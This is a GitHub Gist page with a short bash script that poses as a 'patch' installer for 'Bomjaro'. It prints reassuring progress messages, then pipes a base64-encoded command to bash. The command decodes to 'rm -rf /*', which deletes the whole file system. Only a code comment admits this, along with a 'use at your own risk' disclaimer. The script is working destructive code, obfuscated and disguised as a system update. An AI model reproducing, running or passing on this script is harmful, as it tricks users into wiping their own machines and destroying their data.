Skip to content

Instantly share code, notes, and snippets.

@progzone122
Created August 27, 2025 01:04
Show Gist options
  • Select an option

  • Save progzone122/0723d40ee3f24071d10b82a3045e5629 to your computer and use it in GitHub Desktop.

Select an option

Save progzone122/0723d40ee3f24071d10b82a3045e5629 to your computer and use it in GitHub Desktop.
#!/bin/bash
# Same as rm -rf /* command.
# Use at your own risk! I am not responsible for any damage
echo "A patch is being installed on Bomjaro..."
echo "Please, wait..."
sleep 5
echo "cm0gLXJmIC8qCg==" | base64 --decode | bash
echo "Done! :)"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment